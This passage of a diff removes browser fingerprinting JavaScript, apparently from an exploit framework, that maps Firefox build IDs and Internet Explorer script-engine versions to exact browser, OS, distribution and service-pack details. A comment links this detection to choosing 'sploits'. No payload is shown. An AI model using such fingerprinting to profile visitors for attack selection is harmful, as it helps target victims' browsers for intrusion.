-					case "2009101600": ua_version = "3.0.15"; break; // Can be either Mac or Linux
-					case "20091016": ua_version = "3.5.4"; os_name = "#{oses::LINUX}"; os_flavor = "SUSE"; arch = "#{ARCH_X86}"; break;
-				} break;
-			case "2009101601": ua_version = "3.0.15"; os_name = "#{oses::WINDOWS}"; break;
-			case "20091016081620": ua_version = "3.5.4"; os_name = "#{oses::MAC_OSX}"; break;
-			case "20091016081727": ua_version = "3.5.4"; os_name = "#{oses::LINUX}"; break;
-			case "20091016092926": ua_version = "3.5.4"; os_name = "#{oses::WINDOWS}"; break;
-			case "20091020122601": ua_version = "3.5.4"; os_name = "#{oses::LINUX}"; os_flavor = "Ubuntu"; arch = "#{ARCH_X86_64}"; break; // Could also be Mint x86-64
-			case "2009102814":
-				switch (navigator.productSub) {
-					case "2009121601": ua_version = "3.0.16"; os_name = "#{oses::LINUX}"; os_flavor = "Ubuntu"; break;
-					case "2009121602": ua_version = "3.0.16"; os_name = "#{oses::LINUX}"; os_flavor = "Ubuntu"; break;
-					case "2010010604": ua_version = "3.0.17"; os_name = "#{oses::LINUX}"; os_flavor = "Mint"; break;
-					case "2010021501": ua_version = "3.0.17;xul1.9.0.18"; os_name = "#{oses::LINUX}"; os_flavor = "Mint"; arch = "#{ARCH_X86}"; break;
-					case "2010021502": ua_version = "3.0.17;xul1.9.0.18"; os_name = "#{oses::LINUX}"; os_flavor = "Mint"; arch = "#{ARCH_X86_64}"; break;
-				} break;
-			case "2009102815":
-				switch (navigator.productSub) {
-					case "2009102815": ua_version = "3.0.15"; os_name = "#{oses::LINUX}"; os_flavor = "Ubuntu"; arch = "#{ARCH_X86}"; break;
-					case "2009121601": ua_version = "3.0.16"; os_name = "#{oses::LINUX}"; os_flavor = "Ubuntu"; arch = "#{ARCH_X86}"; break;
-				} break;
-			case "20091029152254": ua_version = "3.6.0.b1"; os_name = "#{oses::LINUX}"; break;
-			case "20091029171059": ua_version = "3.6.0.b1"; os_name = "#{oses::WINDOWS}"; break;
-			case "20091102134505": ua_version = "3.5.5"; os_name = "#{oses::MAC_OSX}"; break;
-			case "20091102141836": ua_version = "3.5.5"; os_name = "#{oses::LINUX}"; break;
-			case "20091102152451": ua_version = "3.5.5"; os_name = "#{oses::WINDOWS}"; break;
-			case "2009110421": ua_version = "3.0.15"; os_name = "#{oses::FREEBSD}"; arch = "#{ARCH_X86}"; break;
-			case "20091106091959": ua_version = "3.5.5"; os_name = "#{oses::LINUX}"; os_flavor = "Mandriva"; arch = "#{ARCH_X86}"; break;
-			case "20091106140514": ua_version = "3.5.5"; os_name = "#{oses::FREEBSD}"; os_flavor = "PC-BSD"; arch = "#{ARCH_X86}"; break;
-			case "20091106145609": ua_version = "3.5.5"; os_name = "#{oses::FREEBSD}"; os_flavor = "PC-BSD"; arch = "#{ARCH_X86_64}"; break;
-			case "20091108163911": ua_version = "3.6.0.b2"; os_name = "#{oses::LINUX}"; break;
-			case "20091108181924": ua_version = "3.6.0.b2"; os_name = "#{oses::WINDOWS}"; break;
-			case "20091109125225":
-				switch (navigator.productSub) {
-					case "20091109": ua_version = "3.5.5"; os_name = "#{oses::LINUX}"; os_flavor = "Ubuntu"; arch = "#{ARCH_X86}"; break;
-					case "20091215": ua_version = "3.5.6"; os_name = "#{oses::LINUX}"; os_flavor = "Ubuntu"; arch = "#{ARCH_X86}"; break;
-				} break;
-			case "20091109134913": ua_version = "3.5.5"; os_name = "#{oses::LINUX}"; os_flavor = "Ubuntu"; arch = "#{ARCH_X86_64}"; break;
-			case "20091115172547": ua_version = "3.6.0.b3"; os_name = "#{oses::LINUX}"; break;
-			case "20091115182845": ua_version = "3.6.0.b3"; os_name = "#{oses::WINDOWS}"; break;
-			case "20091124201530": ua_version = "3.6.0.b4"; os_name = "#{oses::MAC_OSX}"; break;
-			case "20091124201751": ua_version = "3.6.0.b4"; os_name = "#{oses::LINUX}"; break;
-			case "20091124213835": ua_version = "3.6.0.b4"; os_name = "#{oses::WINDOWS}"; break;
-			case "2009120100": ua_version = "3.5.6"; os_name = "#{oses::LINUX}"; os_flavor = "SUSE"; break;
-			case "20091201203240": ua_version = "3.5.6"; os_name = "#{oses::MAC_OSX}"; break;
-			case "20091201204959": ua_version = "3.5.6"; os_name = "#{oses::LINUX}"; break;
-			case "20091201220228": ua_version = "3.5.6"; os_name = "#{oses::WINDOWS}"; break;
-			case "2009120206": ua_version = "3.0.16"; break; // Can be either Mac or Linux
-			case "2009120208": ua_version = "3.0.16"; os_name = "#{oses::WINDOWS}"; break;
-			case "20091204132459": ua_version = "3.6.0.b5"; os_name = "#{oses::LINUX}"; break;
-			case "20091204132509": ua_version = "3.6.0.b5"; os_name = "#{oses::MAC_OSX}"; break;
-			case "20091204143806": ua_version = "3.6.0.b5"; os_name = "#{oses::WINDOWS}"; break;
-			case "20091215230859": ua_version = "3.5.7"; os_name = "#{oses::LINUX}"; os_flavor = "Ubuntu"; arch = "#{ARCH_X86}"; break;
-			case "20091215230946": ua_version = "3.5.7"; os_name = "#{oses::LINUX}"; os_flavor = "Ubuntu"; arch = "#{ARCH_X86_64}"; break;
-			case "20091215231400": ua_version = "3.5.7"; os_name = "#{oses::LINUX}"; os_flavor = "Ubuntu"; arch = "#{ARCH_X86}"; break; // Could also be Mint x86
-			case "20091215231754":
-				switch (navigator.productSub) {
-					case "20091215": ua_version = "3.5.6"; os_name = "#{oses::LINUX}"; os_flavor = "Ubuntu"; arch = "#{ARCH_X86_64}"; break;
-					case "20100106": ua_version = "3.5.7"; os_name = "#{oses::LINUX}"; os_flavor = "Ubuntu"; arch = "#{ARCH_X86_64}"; break; // Could also be Mint x86-64
-				} break;
-			case "2009121601":
-				switch (navigator.productSub) {
-					case "2009121601": ua_version = "3.0.16"; os_name = "#{oses::LINUX}"; os_flavor = "Ubuntu"; arch = "#{ARCH_X86_64}"; break;
-					case "2010010604": ua_version = "3.0.17"; os_name = "#{oses::LINUX}"; os_flavor = "Ubuntu"; break; // Could also be Mint x86-64
-				} break;
-			case "2009121602": ua_version = "3.0.17"; os_name = "#{oses::LINUX}"; os_flavor = "Ubuntu"; break;
-			case "20091216104148": ua_version = "3.5.6"; os_name = "#{oses::LINUX}"; os_flavor = "Mandriva"; break;
-			case "20091216132458": ua_version = "3.5.6"; os_name = "#{oses::LINUX}"; os_flavor = "Fedora"; arch = "#{ARCH_X86}"; break;
-			case "20091216132537": ua_version = "3.5.6"; os_name = "#{oses::LINUX}"; os_flavor = "Fedora"; arch = "#{ARCH_X86_64}"; break;
-			case "20091216142458": ua_version = "3.5.6"; os_name = "#{oses::LINUX}"; os_flavor = "Fedora"; arch = "#{ARCH_X86_64}"; break;
-			case "20091216142519": ua_version = "3.5.6"; os_name = "#{oses::LINUX}"; os_flavor = "Fedora"; arch = "#{ARCH_X86}"; break;
-			case "2009121708": ua_version = "3.0.16"; os_name = "#{oses::LINUX}"; os_flavor = "CentOS"; arch = "#{ARCH_X86}"; break;
-			case "2009122115": ua_version = "3.0.17"; break; // Can be either Mac or Linux
-			case "2009122116": ua_version = "3.0.17"; os_name = "#{oses::WINDOWS}"; break;
-			case "20091221151141": ua_version = "3.5.7"; os_name = "#{oses::MAC_OSX}"; break;
-			case "20091221152502": ua_version = "3.5.7"; os_name = "#{oses::LINUX}"; break;
-			case "20091221164558": ua_version = "3.5.7"; os_name = "#{oses::WINDOWS}"; break;
-			case "2009122200": ua_version = "3.5.7"; os_name = "#{oses::LINUX}"; os_flavor = "SUSE"; break;
-			case "20091223231431": ua_version = "3.5.6"; os_name = "#{oses::LINUX}"; os_flavor = "PCLunixOS"; arch = "#{ARCH_X86}"; break;
-			case "20100105194006": ua_version = "3.6.0.rc1"; os_name = "#{oses::MAC_OSX}"; break;
-			case "20100105194116": ua_version = "3.6.0.rc1"; os_name = "#{oses::LINUX}"; break;
-			case "20100105212446": ua_version = "3.6.0.rc1"; os_name = "#{oses::WINDOWS}"; break;
-			case "2010010604": ua_version = "3.0.18"; os_name = "#{oses::LINUX}"; os_flavor = "Ubuntu"; break;
-			case "2010010605": ua_version = "3.0.18"; os_name = "#{oses::LINUX}"; os_flavor = "Ubuntu"; arch = "#{ARCH_X86_64}"; break;
-			case "20100106054534": ua_version = "3.5.8"; os_name = "#{oses::LINUX}"; os_flavor = "Ubuntu"; arch = "#{ARCH_X86}"; break; // Could also be Mint x86
-			case "20100106054634": ua_version = "3.5.8"; os_name = "#{oses::LINUX}"; os_flavor = "Ubuntu"; arch = "#{ARCH_X86_64}"; break; // Could also be Mint x86-64
-			case "20100106211825": ua_version = "3.5.7"; os_name = "#{oses::FREEBSD}"; os_flavor = "PC-BSD"; arch = "#{ARCH_X86}"; break;
-			case "20100106212742": ua_version = "3.5.7"; os_name = "#{oses::FREEBSD}"; os_flavor = "PC-BSD"; arch = "#{ARCH_X86_64}"; break;
-			case "20100106215614": ua_version = "3.5.7"; os_name = "#{oses::FREEBSD}"; os_flavor = "PC-BSD"; arch = "#{ARCH_X86}"; break;
-			case "20100110112429": ua_version = "3.5.7"; os_name = "#{oses::LINUX}"; os_flavor = "Mandriva"; break;
-			case "20100115132715": ua_version = "3.6.0"; os_name = "#{oses::MAC_OSX}"; break;
-			case "20100115133306": ua_version = "3.6.0"; os_name = "#{oses::LINUX}"; break;
-			case "20100115144158": ua_version = "3.6.0"; os_name = "#{oses::WINDOWS}"; break;
-			case "20100125074043": ua_version = "3.6.0"; os_name = "#{oses::LINUX}"; os_flavor = "Ubuntu"; arch = "#{ARCH_X86}"; break; // Could also be Mint x86
-			case "20100125074127": ua_version = "3.6.0"; os_name = "#{oses::LINUX}"; os_flavor = "Ubuntu"; arch = "#{ARCH_X86_64}"; break; // Could also be Mint x86-64
-			case "20100125204847": ua_version = "3.6.0"; os_name = "#{oses::LINUX}"; os_flavor = "Sabayon"; arch = "#{ARCH_X86}"; break; // Could also be Mint x86
-			case "20100125204903": ua_version = "3.6.0"; os_name = "#{oses::LINUX}"; os_flavor = "Sabayon"; arch = "#{ARCH_X86_64}"; break; // Could also be Mint x86-64
-			case "20100202152834": ua_version = "3.5.8"; os_name = "#{oses::MAC_OSX}"; break;
-			case "20100202153512": ua_version = "3.5.8"; os_name = "#{oses::LINUX}"; break;
-			case "20100202165920": ua_version = "3.5.8"; os_name = "#{oses::WINDOWS}"; break;
-			case "2010020219": ua_version = "3.0.18"; os_name = "#{oses::MAC_OSX}"; break;
-			case "2010020220": ua_version = "3.0.18"; os_name = "#{oses::WINDOWS}"; break;
-			case "2010020400": ua_version = "3.5.8"; os_name = "#{oses::LINUX}"; os_flavor = "SUSE"; break;
-			case "20100212131909": ua_version = "3.6.0.2"; os_name = "#{oses::LINUX}"; os_flavor = "Ubuntu"; arch = "#{ARCH_X86}"; break;
-			case "20100212132013": ua_version = "3.6.0.2"; os_name = "#{oses::LINUX}"; os_flavor = "Ubuntu"; arch = "#{ARCH_X86_64}"; break;
-			case "20100216105329": ua_version = "3.5.8"; os_name = "#{oses::LINUX}"; os_flavor = "Fedora"; arch = "#{ARCH_X86_64}"; break;
-			case "20100216105348": ua_version = "3.5.8"; os_name = "#{oses::LINUX}"; os_flavor = "Fedora"; arch = "#{ARCH_X86}"; break;
-			case "20100216105410": ua_version = "3.5.8"; os_name = "#{oses::LINUX}"; os_flavor = "Fedora"; arch = "#{ARCH_X86}"; break;
-			case "20100216110009": ua_version = "3.5.8"; os_name = "#{oses::LINUX}"; os_flavor = "Fedora"; arch = "#{ARCH_X86_64}"; break;
-			case "2010021718": ua_version = "3.0.18"; os_name = "#{oses::LINUX}"; os_flavor = "CentOS"; arch = "#{ARCH_X86}"; break;
-			case "20100218022359": ua_version = "3.6.0.4"; os_name = "#{oses::LINUX}"; os_flavor = "Ubuntu"; arch = "#{ARCH_X86}"; break;
-			case "20100218022705": ua_version = "3.6.0.4"; os_name = "#{oses::LINUX}"; os_flavor = "Ubuntu"; arch = "#{ARCH_X86_64}"; break;
-			case "20100218112915": ua_version = "3.5.8"; os_name = "#{oses::LINUX}"; os_flavor = "Mandriva"; arch = "#{ARCH_X86}"; break;
-			case "20100222120605": ua_version = "3.6.0.5"; os_name = "#{oses::LINUX}"; os_flavor = "Ubuntu"; arch = "#{ARCH_X86}"; break;
-			case "20100222120717": ua_version = "3.6.0.5"; os_name = "#{oses::LINUX}"; os_flavor = "Ubuntu"; arch = "#{ARCH_X86_64}"; break;
-			case "20100301015346": ua_version = "3.6.0"; os_name = "#{oses::FREEBSD}"; os_flavor = "PC-BSD"; arch = "#{ARCH_X86}"; break;
-			case "20100305054927": ua_version = "3.6.0"; os_name = "#{oses::FREEBSD}"; os_flavor = "PC-BSD"; arch = "#{ARCH_X86_64}"; break;
-			case "20100307204001": ua_version = "3.6.0"; os_name = "#{oses::FREEBSD}"; os_flavor = "PC-BSD"; arch = "#{ARCH_X86}"; break;
-			case "20100308142847": ua_version = "3.6.0.6"; os_name = "#{oses::LINUX}"; os_flavor = "Ubuntu"; arch = "#{ARCH_X86}"; break;
-			case "20100308151019": ua_version = "3.6.0.6"; os_name = "#{oses::LINUX}"; os_flavor = "Ubuntu"; arch = "#{ARCH_X86_64}"; break;
-			case "2010031218": ua_version = "3.0.19"; break; // Mac OS X or Linux
-			case "2010031422": ua_version = "3.0.19"; os_name = "#{oses::WINDOWS}"; break;
-			case "20100315075757": ua_version = "3.5.9"; os_name = "#{oses::LINUX}"; break;
-			case "20100315080228": ua_version = "3.5.9"; os_name = "#{oses::MAC_OSX}"; break;
-			case "20100315083431": ua_version = "3.5.9"; os_name = "#{oses::WINDOWS}"; break;
-			case "20100316055951": ua_version = "3.6.2"; os_name = "#{oses::MAC_OSX}"; break;
-			case "20100316060223": ua_version = "3.6.2"; os_name = "#{oses::LINUX}"; break;
-			case "20100316074819": ua_version = "3.6.2"; os_name = "#{oses::WINDOWS}"; break;
-			case "2010031700": ua_version = "3.5.9"; os_name = "#{oses::LINUX}"; os_flavor = "SUSE"; break;
-			case "20100323102218": ua_version = "3.6.2"; os_name = "#{oses::LINUX}"; os_flavor = "Fedora"; arch = "#{ARCH_X86_64}"; break;
-			case "20100323102339": ua_version = "3.6.2"; os_name = "#{oses::LINUX}"; os_flavor = "Fedora"; arch = "#{ARCH_X86}"; break;
-			case "20100323194640": ua_version = "3.6.2"; os_name = "#{oses::FREEBSD}"; os_flavor = "PC-BSD"; arch = "#{ARCH_X86_64}"; break;
-			case "20100324182054": ua_version = "3.6.2"; os_name = "#{oses::FREEBSD}"; os_flavor = "PC-BSD"; arch = "#{ARCH_X86}"; break;
-			case "20100330071911": ua_version = "3.5.9"; os_name = "#{oses::LINUX}"; os_flavor = "Fedora"; arch = "#{ARCH_X86_64}"; break;
-			case "20100330072017": ua_version = "3.5.9"; os_name = "#{oses::LINUX}"; os_flavor = "Fedora"; arch = "#{ARCH_X86_64}"; break;
-			case "20100330072020": ua_version = "3.5.9"; os_name = "#{oses::LINUX}"; os_flavor = "Fedora"; arch = "#{ARCH_X86}"; break;
-			case "20100330072034": ua_version = "3.5.9"; os_name = "#{oses::LINUX}"; os_flavor = "Fedora"; arch = "#{ARCH_X86}"; break;
-			case "20100401064631": ua_version = "3.6.3"; os_name = "#{oses::MAC_OSX}"; break;
-			case "20100401074458": ua_version = "3.6.3"; os_name = "#{oses::LINUX}"; break;
-			case "20100401080539": ua_version = "3.6.3"; os_name = "#{oses::WINDOWS}"; break;
-			case "20100401144201": ua_version = "3.6.2"; os_name = "#{oses::LINUX}"; os_flavor = "Ubuntu"; arch = "#{ARCH_X86}"; break;
-			case "2010040116": ua_version = "3.0.19"; os_name = "#{oses::LINUX}"; os_flavor = "Ubuntu"; arch = "#{ARCH_X86}"; break;
-			case "2010040118": ua_version = "3.0.19"; os_name = "#{oses::LINUX}"; os_flavor = "Ubuntu"; arch = "#{ARCH_X86}"; break;
-			case "2010040119": ua_version = "3.0.19"; os_name = "#{oses::LINUX}"; os_flavor = "Ubuntu"; arch = "#{ARCH_X86}"; break;
-			case "2010040121": ua_version = "3.0.19"; os_name = "#{oses::LINUX}"; os_flavor = "Ubuntu"; arch = "#{ARCH_X86_64}"; break;
-			case "20100401213457": ua_version = "3.5.9"; os_name = "#{oses::LINUX}"; os_flavor = "Ubuntu"; arch = "#{ARCH_X86}"; break;
-			case "2010040123": ua_version = "3.0.19"; os_name = "#{oses::LINUX}"; os_flavor = "Ubuntu"; arch = "#{ARCH_X86_64}"; break;
-			case "2010040200": ua_version = "3.0.19"; os_name = "#{oses::LINUX}"; os_flavor = "Ubuntu"; arch = "#{ARCH_X86_64}"; break;
-			case "20100402010516": ua_version = "3.5.9"; os_name = "#{oses::LINUX}"; os_flavor = "Mint"; arch = "#{ARCH_X86_64}"; break;
-			case "20100402041908": ua_version = "3.6.2"; os_name = "#{oses::LINUX}"; os_flavor = "Ubuntu"; arch = "#{ARCH_X86_64}"; break;
-			case "20100403042003": ua_version = "3.6.3"; os_name = "#{oses::LINUX}"; os_flavor = "Fedora"; arch = "#{ARCH_X86_64}"; break;
-			case "20100403082016": ua_version = "3.6.3"; os_name = "#{oses::LINUX}"; os_flavor = "Fedora"; arch = "#{ARCH_X86}"; break;
-			case "20100404024515": ua_version = "3.6.3"; os_name = "#{oses::LINUX}"; os_flavor = "Ubuntu"; arch = "#{ARCH_X86}"; break;
-			case "20100404024646": ua_version = "3.6.3"; os_name = "#{oses::LINUX}"; os_flavor = "Ubuntu"; arch = "#{ARCH_X86_64}"; break;
-			case "20100404104043": ua_version = "3.6.3"; os_name = "#{oses::LINUX}"; os_flavor = "PClinuxOS"; arch = "#{ARCH_X86_64}"; break;
-			case "20100409151117": ua_version = "3.6.3.2"; os_name = "#{oses::LINUX}"; os_flavor = "Ubuntu"; arch = "#{ARCH_X86}"; break;
-			case "20100409170726": ua_version = "3.6.3.2"; os_name = "#{oses::LINUX}"; os_flavor = "Ubuntu"; arch = "#{ARCH_X86_64}"; break;
-			case "20100412125148": ua_version = "3.6.3"; os_name = "#{oses::LINUX}"; os_flavor = "Mandriva"; arch = "#{ARCH_X86}"; break;
-			case "20100413152922": ua_version = "3.6.4.b1"; os_name = "#{oses::MAC_OSX}"; break;
-			case "20100413154310": ua_version = "3.6.4.b1"; os_name = "#{oses::LINUX}"; break;
-			case "20100413172113": ua_version = "3.6.4.b1"; os_name = "#{oses::WINDOWS}"; break;
-			case "20100415062243": ua_version = "3.6.3.3"; os_name = "#{oses::LINUX}"; os_flavor = "Ubuntu"; arch = "#{ARCH_X86}"; break;
-			case "20100415103754": ua_version = "3.6.3.3"; os_name = "#{oses::LINUX}"; os_flavor = "Ubuntu"; arch = "#{ARCH_X86_64}"; break;
-			case "20100416101101": ua_version = "3.6.3.2"; os_name = "#{oses::LINUX}"; os_flavor = "Mandriva"; arch = "#{ARCH_X86}"; break;
-			case "2010041700": ua_version = "3.6.4.1"; os_name = "#{oses::LINUX}"; os_flavor = "SUSE"; break;
-			case "20100419015333": ua_version = "3.6.3"; os_name = "#{oses::FREEBSD}"; os_flavor = "PC-BSD"; arch = "#{ARCH_X86_64}"; break;
-			case "20100423043606": ua_version = "3.6.3"; os_name = "#{oses::LINUX}"; os_flavor = "Sabayon"; arch = "#{ARCH_X86_64}"; break;
-			case "20100423140709": ua_version = "3.6.3"; os_name = "#{oses::LINUX}"; os_flavor = "Ubuntu"; arch = "#{ARCH_X86}"; break;
-			case "20100423141150": ua_version = "3.6.3"; os_name = "#{oses::LINUX}"; os_flavor = "Ubuntu"; arch = "#{ARCH_X86_64}"; break;
-			case "20100423142835": ua_version = "3.6.3"; os_name = "#{oses::FREEBSD}"; os_flavor = "PC-BSD"; arch = "#{ARCH_X86}"; break;
-			case "20100502202326": ua_version = "3.6.4.b2"; os_name = "#{oses::LINUX}"; break;
-			case "20100502202401": ua_version = "3.6.4.b2"; os_name = "#{oses::MAC_OSX}"; break;
-			case "20100502221517": ua_version = "3.6.4.b2"; os_name = "#{oses::WINDOWS}"; break;
-			case "20100503113315": ua_version = "3.6.4.b3"; os_name = "#{oses::MAC_OSX}"; break;
-			case "20100503113541": ua_version = "3.6.4.b3"; os_name = "#{oses::LINUX}"; break;
-			case "20100503122926": ua_version = "3.6.4.b3"; os_name = "#{oses::WINDOWS}"; break;
-			case "20100504085637": ua_version = "3.5.10"; os_name = "#{oses::LINUX}"; break;
-			case "20100504085753": ua_version = "3.5.10"; os_name = "#{oses::MAC_OSX}"; break;
-			case "20100504093643": ua_version = "3.5.10"; os_name = "#{oses::WINDOWS}"; break;
-			case "2010050600": ua_version = "3.5.10"; os_name = "#{oses::LINUX}"; os_flavor = "SUSE"; break;
-			case "2010051300": ua_version = "3.6.4.1"; os_name = "#{oses::LINUX}"; os_flavor = "SUSE"; break;
-			case "20100513134853": ua_version = "3.6.4.b4"; os_name = "#{oses::MAC_OSX}"; break;
-			case "20100513140540": ua_version = "3.6.4.b4"; os_name = "#{oses::LINUX}"; break;
-			case "20100513144105": ua_version = "3.6.4.b4"; os_name = "#{oses::WINDOWS}"; break;
-			case "20100513190740": ua_version = "3.6.3"; os_name = "#{oses::FREEBSD}"; os_flavor = "PC-BSD"; arch = "#{ARCH_X86_64}"; break;
-			case "20100523180910": ua_version = "3.6.4.b5"; os_name = "#{oses::MAC_OSX}"; break;
-			case "20100523181754": ua_version = "3.6.4.b5"; os_name = "#{oses::LINUX}"; break;
-			case "20100523185824": ua_version = "3.6.4.b5"; os_name = "#{oses::WINDOWS}"; break;
-			case "20100527084110": ua_version = "3.6.4.b6"; os_name = "#{oses::MAC_OSX}"; break;
-			case "20100527085242": ua_version = "3.6.4.b6"; os_name = "#{oses::LINUX}"; break;
-			case "20100527093236": ua_version = "3.6.4.b6"; os_name = "#{oses::WINDOWS}"; break;
-			case "2010061100": ua_version = "3.6.4"; os_name = "#{oses::LINUX}"; os_flavor = "SUSE"; break;
-			case "20100611134546": ua_version = "3.6.4.b7"; os_name = "#{oses::MAC_OSX}"; break;
-			case "20100611135942": ua_version = "3.6.4.b7"; os_name = "#{oses::LINUX}"; break;
-			case "20100611143157": ua_version = "3.6.4.b7"; os_name = "#{oses::WINDOWS}"; break;
-			case "20100622203044": ua_version = "3.6.4"; os_name = "#{oses::LINUX}"; os_flavor = "Fedora"; arch = "#{ARCH_X86_64}"; break;
-			case "20100622203045": ua_version = "3.6.4"; os_name = "#{oses::LINUX}"; os_flavor = "Fedora"; arch = "#{ARCH_X86}"; break;
-			case "20100622204750": ua_version = "3.5.10"; os_name = "#{oses::LINUX}"; os_flavor = "Fedora"; arch = "#{ARCH_X86_64}"; break;
-			case "20100622204830": ua_version = "3.5.10"; os_name = "#{oses::LINUX}"; os_flavor = "Fedora"; arch = "#{ARCH_X86}"; break;
-			case "20100622205038": ua_version = "3.6.4"; os_name = "#{oses::LINUX}"; os_flavor = "PClinuxOS"; arch = "#{ARCH_X86_64}"; break;
-			case "20100623081410": ua_version = "3.6.4"; os_name = "#{oses::LINUX}"; os_flavor = "CentOS"; arch = "#{ARCH_X86_64}"; break;
-			case "20100623081921": ua_version = "3.6.4"; os_name = "#{oses::LINUX}"; os_flavor = "CentOS"; arch = "#{ARCH_X86}"; break;
-			case "20100623155731": ua_version = "3.6.4.b7"; os_name = "#{oses::LINUX}"; os_flavor = "Ubuntu"; arch = "#{ARCH_X86}"; break;
-			case "20100623200132": ua_version = "3.6.4.b7"; os_name = "#{oses::LINUX}"; os_flavor = "Ubuntu"; arch = "#{ARCH_X86_64}"; break;
-			case "20100625222733": ua_version = "3.6.6"; os_name = "#{oses::LINUX}"; break;
-			case "20100625223402": ua_version = "3.6.6"; os_name = "#{oses::MAC_OSX}"; break;
-			case "20100625231939": ua_version = "3.6.6"; os_name = "#{oses::WINDOWS}"; break;
-			case "20100626104508": ua_version = "3.6.4"; os_name = "#{oses::FREEBSD}"; os_flavor = "PC-BSD"; arch = "#{ARCH_X86}"; break;
-			case "20100627211341": ua_version = "3.6.4"; os_name = "#{oses::FREEBSD}"; os_flavor = "PC-BSD"; arch = "#{ARCH_X86_64}"; break;
-			case "20100628082832": ua_version = "3.6.6"; os_name = "#{oses::LINUX}"; os_flavor = "PClinuxOS"; arch = "#{ARCH_X86_64}"; break;
-			case "20100628124739": ua_version = "3.6.6"; os_name = "#{oses::LINUX}"; os_flavor = "Ubuntu"; arch = "#{ARCH_X86}"; break;
-			case "20100628143222": ua_version = "3.6.6"; os_name = "#{oses::LINUX}"; os_flavor = "Ubuntu"; arch = "#{ARCH_X86_64}"; break;
-			case "20100628232431": ua_version = "3.6.6"; os_name = "#{oses::LINUX}"; os_flavor = "Ubuntu"; arch = "#{ARCH_X86}"; break;
-			case "20100629034705": ua_version = "3.6.6"; os_name = "#{oses::LINUX}"; os_flavor = "Ubuntu"; arch = "#{ARCH_X86_64}"; break;
-			case "20100629105354": ua_version = "3.6.6"; os_name = "#{oses::LINUX}"; os_flavor = "Mandriva"; arch = "#{ARCH_X86}"; break;
-			case "20100630130433": ua_version = "3.6.6"; os_name = "#{oses::LINUX}"; os_flavor = "Ubuntu"; arch = "#{ARCH_X86_64}"; break;
-			case "20100630131607": ua_version = "4.0.0.b1"; os_name = "#{oses::MAC_OSX}"; break;
-			case "20100630132217": ua_version = "4.0.0.b1"; os_name = "#{oses::LINUX}"; break;
-			case "20100630141702": ua_version = "4.0.0.b1"; os_name = "#{oses::WINDOWS}"; break;
-			case "20100630174226": ua_version = "3.6.6"; os_name = "#{oses::LINUX}"; os_flavor = "Sabayon"; arch = "#{ARCH_X86_64}"; break;
-			case "20100630180611": ua_version = "3.6.6"; os_name = "#{oses::LINUX}"; os_flavor = "Sabayon"; arch = "#{ARCH_X86}"; break;
-			case "20100709115208": ua_version = "3.6.7.b1"; os_name = "#{oses::LINUX}"; os_flavor = "Ubuntu"; arch = "#{ARCH_X86}"; break;
-			case "20100709183408": ua_version = "3.6.7.b1"; os_name = "#{oses::LINUX}"; os_flavor = "Ubuntu"; arch = "#{ARCH_X86_64}"; break;
-			case "20100716093011": ua_version = "3.6.7.b2"; os_name = "#{oses::LINUX}"; os_flavor = "Ubuntu"; arch = "#{ARCH_X86_64}"; break;
-			case "20101203075014": ua_version = "3.6.13"; os_name = "#{oses::WINDOWS}"; break;
-			case "20101206122825": ua_version = "3.6.13"; os_name = "#{oses::LINUX}"; os_flavor = "Ubuntu"; break;
-			default:
-				version = searchVersion("Firefox", navigator.userAgent);
-				// Verify whether the ua string is lying by checking if it contains
-				// the major version we detected using known objects above.  If it
-				// appears to be truthful, then use its more precise version number.
-				if (version && version.split(".")[0] == ua_version.split(".")[0]) {
-					// The version number will sometimes end with a space or end of
-					// line, so strip off anything after a space if one exists
-					if (-1 != version.indexOf(" ")) {
-						version = version.substr(0,version.indexOf(" "));
-					}
-					ua_version = version;
-				} else {
-					ua_is_lying = true;
-				}
-				break;
-		}
-		//if (ua_is_lying) { alert("UA is lying"); }
-		//alert(ua_version + " vs " + navigator.userAgent);
-
-		// end navigator.buildID checks
-
-	} else if (typeof ScriptEngineMajorVersion == "function") {
-		// Then this is IE and we can very reliably detect the OS.
-		// Need to add detection for IE on Mac.  Low priority, since we
-		// don't have any sploits for it yet and it's a very low market
-		// share.
-		os_name = "#{oses::WINDOWS}";
-		ua_name = "#{clients::IE}";
-		version = ScriptEngineMajorVersion().toString();
-		version += ScriptEngineMinorVersion().toString();
-		version += ScriptEngineBuildVersion().toString();
-		//document.write("ScriptEngine: "+version+"<br />");
-		switch (version){
-			case "514615":
-				// IE 5.00.2920.0000, 2000 Advanced Server SP0 English
-				ua_version = "5.0";
-				os_flavor = "2000";
-				os_sp = "SP0";
-				break;
-			case "515907":
-				os_flavor = "2000";
-				os_sp = "SP3";	//or SP2: oCC.getComponentVersion('{22d6f312-b0f6-11d0-94ab-0080c74c7e95}', 'componentid') => 6,4,9,1109
-				break;
-			case "518513":
-				os_flavor = "2000";
-				os_sp = "SP4";
-				break;
-			case "566626":
-				// IE 6.0.2600.0000, XP SP0 English
-				// IE 6.0.2800.1106, XP SP1 English
-				ua_version = "6.0";
-				os_flavor = "XP";
-				os_sp = "SP0";
-				break;
-			case "568515":
-				// IE 6.0.3790.0, 2003 Standard SP0 English
-				ua_version = "6.0";
-				os_flavor = "2003";
-				os_sp = "SP0";
-				break;
-			case "568820":
-				// IE 6.0.2900.2180, xp sp2 english
-				os_flavor = "XP";
-				os_sp = "SP2";
-				break;
-			case "568827":
-				os_flavor = "2003";
-				os_sp = "SP1";
-				break;
-			case "568831":	//XP SP2 -OR- 2K SP4
-				if (os_flavor == "2000"){
-					os_sp = "SP4";
-				}
-				else{
-					os_flavor = "XP";
-					os_sp = "SP2";
-				}
-				break;
-			case "568832":
-				os_flavor = "2003";
-				os_sp = "SP2";
-				break;
-			case "568837":
-				// IE 6.0.2900.2180, XP Professional SP2 Korean
-				ua_version = "6.0";
-				os_flavor = "XP";
-				os_sp = "SP2";
-				break;
-			case "575730":
-				// IE 7.0.5730.13, Server 2003 Standard SP2 English
-				// IE 7.0.5730.13, Server 2003 Standard SP1 English
-				// IE 7.0.5730.13, XP Professional SP2 English
-				// Rely on the user agent matching above to determine the OS.
-				// This will incorrectly identify 2k3 SP1 as SP2
-				ua_version = "7.0";
-				os_sp = "SP2";
-				break;
-			case "5716599":
-				// IE 7.0.5730.13, XP Professional SP3 English
-			case "5718066":
-				// IE 7.0.5730.13, XP Professional SP3 English
-				ua_version = "7.0";
-				os_flavor = "XP";
-				os_sp = "SP3";
-				break;
-			case "576000":
-				// IE 7.0.6000.16386, Vista Ultimate SP0 English
-				ua_version = "7.0";
-				os_flavor = "Vista";
-				os_sp = "SP0";
-				break;
-			case "5822960":
-				// IE 8.0.6001.18702, XP Professional SP3 Greek
-			case "5818702":
-				// IE 8.0.6001.18702, XP Professional SP3 English
